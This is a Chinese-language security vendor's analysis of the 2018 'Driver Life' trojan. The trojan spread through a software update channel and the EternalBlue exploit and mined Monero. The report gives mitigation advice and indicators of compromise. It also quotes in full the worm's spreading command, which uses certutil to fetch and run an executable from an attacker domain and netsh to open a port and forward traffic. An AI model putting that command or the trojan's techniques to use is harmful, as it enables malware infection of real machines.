产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec DDos防护
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
等保合规服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
运维解决方案
品牌保护解决方案
高防云主机安全
腾讯安心平台解决方案
行业解决方案
游戏行业安全方案
电商行业安全方案
零售行业安全方案
安全专项解决方案
勒索病毒专项解决方案
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
考试入口
证书查询
开启你的安全之旅
联系我们
寻求市场合作
友情链接
腾讯云

- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录

“驱动人生”木马详细分析报告 2小时感染10万台电脑挖门罗币
2018-12-14 20:03:19
一、概述
12月14日下午,腾讯安全御见威胁情报中心监测发现,一款通过“驱动人生”升级通道,并同时利用“永恒之蓝”高危漏洞传播的木马突然爆发,仅2个小时受攻击用户就高达10万。
“驱动人生”木马会利用高危漏洞在企业内网呈蠕虫式传播,并进一步下载云控木马,在中毒电脑上进行门罗币挖矿。云控木马对企业信息安全威胁巨大,企业用户须重点关注。
该病毒爆发刚好是周末时间,令企业网管猝不及防,周一工作日员工电脑开机后,建议立刻查杀病毒,再使用杀毒软件的漏洞修复功能安装系统补丁。个人电脑用户使用腾讯电脑管家即可防御。
本次病毒爆发有三个特点:
1.驱动人生升级通道传播的病毒会在中毒电脑安装云控木马;
2.病毒会利用永恒之蓝漏洞在局域网内主动扩散;
3.通过云端控制收集中毒电脑部分信息,接受云端指令在中毒电脑进行门罗币挖矿。
木马攻击流程图
二、详细分析
dtlupg.exe访问以下url下载病毒
hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe
hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe
(注意,为避免网友点击以上链接可以直接下载病毒程序,对部分字符做了隐藏处理)
病毒文件释放在:
C:\Program Files (x86)\DTLSoft\rili\Updater\ctrlf\f79cb9d2893b254cc75dfb7f3e454a69.exe等位置执行。
f79cb9d2893b254cc75dfb7f3e454a69.exe 运行后最终释放出 C:\WINDOWS\Temp\svvhost.exe
(MD5:2E9710A4B9CBA3CD11E977AF87570E3B)运行,svvhost.exe打包了“永恒之蓝”等漏洞攻击工具在内外网进一步扩散。
2.1 病毒母体
F79CB9D2893B254CC75DFB7F3E454A69.exe
运行后将自身拷贝到C:\windows\system32\svhost.exe,安装为服务并启动,服务名为Ddiver,并在随后拉起云控模块svhhost.exe、攻击模块svvhost.exe。
运行时先检测互斥体,确定是否已感染过。
通过检测以下进程将杀软信息搜集准备上传。
360tray.exe|360sd.exe|avp.exe|KvMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe
检测到任务管理器及游戏进程则将云控模块svhhost.exe退出。
打开互斥体,对象名称为"I am tHe xmr reporter" ,xmr意指xmrig.exe矿机。
搜集系统敏感信息上传到hxxp://i.haqo.net/i.png,并接受返回的云控代码等待执行。
母体设置进程共享内存HSKALWOEDJSLALQEOD
2.2 挖矿
云控木马svhhost.exe其主要功能是,从母体进程svhost.exe共享内存中读取shellcode解密并执行,每隔2000秒读取一次共享内存中的shellcode进行解密执行,共享内存名为HSKALWOEDJSLALQEOD,目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行
云控木马执行流程
云控木马运行后会创建一个线程,该线程函数主要功能是判断进程svhost.exe(母体进程)是否存在,不存在的话则启动该进程,接下来要读取的共享内存数据就是从该进程进行读取
创建线程判断母体进程是否存在
调用OpenFileMappingA打开共享内存,读取共享内存数据
读取共享内存数据
调用RtlDecompressBuffer函数解压共享内存中的数据,为下一步执行做准备
解压共享内存数据
共享内存数据加压完后会执行,目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行
执行shellcode
尝试挖矿时通信IP为172.105.204.237
2.3 攻击模块
攻击模块从地址hxxp://dl.haqo.net/eb.exez下载,作为子进程Svvhost.Exe启动,分析发现该文件是通过python实现的“永恒之蓝”漏洞利用模块压缩打包程序。
子进程Svvhost.Exe为将python实现的“永恒之蓝”漏洞利用模块压缩打包程序。
Mysmb.pyo为攻击时扫描代码。
GitHub上也可以看到相关开源代码
扫描内网445端口进行攻击
不仅攻击内网漏洞机器,还随机找几个外网IP尝试攻击,1次攻击完后沉默20分钟
攻击成功后paylaod在中招机器执行以下命令进行内网扩散传播
cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
安全建议
1. 服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
2. 企业用户在周一上班后,建议使用腾讯御点查杀病毒(个人用户可使用腾讯电脑管家),然后使用漏洞修复功能,修复全网终端存在的系统高危漏洞;
3. 服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
4. 使用杀毒软件拦截可能的病毒攻击;
5. 推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
IOCs
域名
i.haqo.net
dl.haqo.net
md5
2e9710a4b9cba3cd11e977af87570e3b
74e2a43b2b7c6e258b3a3fc2516c1235
f79cb9d2893b254cc75dfb7f3e454a69
URL
hxxp://dl.haqo.net/eb.exez
hxxp://i.haqo.net/i.png?ID= xxxxx

在线咨询